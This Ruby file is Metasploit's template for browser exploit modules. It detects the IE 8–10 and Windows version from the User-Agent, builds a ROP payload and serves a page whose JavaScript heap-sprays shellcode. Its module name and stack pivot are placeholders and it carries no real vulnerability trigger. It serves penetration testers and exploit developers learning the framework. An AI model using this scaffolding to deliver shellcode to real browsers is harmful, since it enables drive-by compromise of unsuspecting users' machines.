147 lines
3.9 KiB
Ruby
147 lines
3.9 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
###
|
|
#
|
|
# This exploit sample demonstrates how a typical browser exploit is written using commonly
|
|
# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
|
|
#
|
|
###
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = NormalRanking
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
include Msf::Exploit::RopDb
|
|
include Msf::Exploit::Remote::BrowserAutopwn
|
|
|
|
# Set :classid and :method for ActiveX exploits. For example:
|
|
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
|
|
# :method => "SetShapeNodeType",
|
|
autopwn_info(
|
|
ua_name: HttpClients::IE,
|
|
ua_minver: "8.0",
|
|
ua_maxver: "10.0",
|
|
javascript: true,
|
|
os_name: OperatingSystems::Match::WINDOWS,
|
|
rank: NormalRanking
|
|
)
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => "Module Name",
|
|
'Description' => %q(
|
|
This template covers IE8/9/10, and uses the user-agent HTTP header to detect
|
|
the browser version. Please note IE8 and newer may emulate an older IE version
|
|
in compatibility mode, in that case the module won't be able to detect the
|
|
browser correctly.
|
|
),
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [ 'sinn3r' ],
|
|
'References' =>
|
|
[
|
|
[ 'URL', 'https://metasploit.com' ]
|
|
],
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
[ 'Automatic', {} ],
|
|
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
|
|
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
|
|
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
|
|
[ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
|
|
[ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
|
|
],
|
|
'Payload' =>
|
|
{
|
|
'BadChars' => "\x00", # js_property_spray
|
|
'StackAdjustment' => -3500
|
|
},
|
|
'Privileged' => false,
|
|
'DisclosureDate' => "Apr 1 2013",
|
|
'DefaultTarget' => 0
|
|
)
|
|
)
|
|
end
|
|
|
|
def get_target(agent)
|
|
return target if target.name != 'Automatic'
|
|
|
|
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
|
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
|
|
|
ie_name = "IE #{ie}"
|
|
|
|
case nt
|
|
when '5.1'
|
|
os_name = 'Windows XP SP3'
|
|
when '6.0'
|
|
os_name = 'Windows Vista'
|
|
when '6.1'
|
|
os_name = 'Windows 7'
|
|
when '6.2'
|
|
os_name = 'Windows 8'
|
|
when '6.3'
|
|
os_name = 'Windows 8.1'
|
|
end
|
|
|
|
targets.each do |t|
|
|
if (!ie.empty? && t.name.include?(ie_name)) && (!nt.empty? && t.name.include?(os_name))
|
|
return t
|
|
end
|
|
end
|
|
|
|
nil
|
|
end
|
|
|
|
def get_payload(t)
|
|
stack_pivot = "\x41\x42\x43\x44"
|
|
code = payload.encoded
|
|
|
|
case t['Rop']
|
|
when :msvcrt
|
|
print_status("Using msvcrt ROP")
|
|
rop_payload = generate_rop_payload('msvcrt', code, 'pivot' => stack_pivot, 'target' => 'xp')
|
|
|
|
else
|
|
print_status("Using JRE ROP")
|
|
rop_payload = generate_rop_payload('java', code, 'pivot' => stack_pivot)
|
|
end
|
|
|
|
rop_payload
|
|
end
|
|
|
|
def get_html(t)
|
|
js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
|
|
html = %|
|
|
<script>
|
|
#{js_property_spray}
|
|
|
|
var s = unescape("#{js_p}");
|
|
sprayHeap({shellcode:s});
|
|
</script>
|
|
|
|
|
|
|
html.gsub(/^\t\t/, '')
|
|
end
|
|
|
|
def on_request_uri(cli, request)
|
|
agent = request.headers['User-Agent']
|
|
print_status("Requesting: #{request.uri}")
|
|
|
|
target = get_target(agent)
|
|
if target.nil?
|
|
print_error("Browser not supported, sending 404: #{agent}")
|
|
send_not_found(cli)
|
|
return
|
|
end
|
|
|
|
print_status("Target selected as: #{target.name}")
|
|
html = get_html(target)
|
|
send_response(cli, html, 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache')
|
|
end
|
|
end
|